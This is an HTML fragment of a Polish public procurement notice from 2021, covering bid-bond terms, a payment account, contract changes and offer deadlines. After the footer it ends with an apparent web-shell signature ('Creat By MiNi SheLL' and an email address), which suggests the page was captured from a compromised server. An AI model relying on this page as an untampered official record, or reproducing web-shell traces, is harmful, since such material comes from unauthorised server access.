Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 10 000<br/>zł (słownie: dziesięć tysięcy złotych 00/100 złotych);<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2020 r. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto w Banku PKO BP nr<br/>rachunku 28 1020 1811 0000 0902 0374 5379 z dopiskiem „Wadium – nr postępowania<br/>ZP.271.1.2021”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania<br/>rachunku Zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia<br/>publicznegona warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr 6 do<br/>SWZ.2. Zakresświadczenia Wykonawcy wynikający z umowy jest tożsamy z jego<br/>zobowiązaniem zawartym wofercie.3. Zamawiający przewiduje możliwość zmiany zawartej<br/>umowy w stosunku do treściwybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz<br/>wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 6 do SWZ.4. Zmiana umowy<br/>wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-08 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Przedmiotowe postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej. Składanie ofert następuje za pośrednictwem platformy zakupowej dostępnej pod adresem internetowym: PLATFORMAZAKUPOWA.PL</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-08 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-06</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-30 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com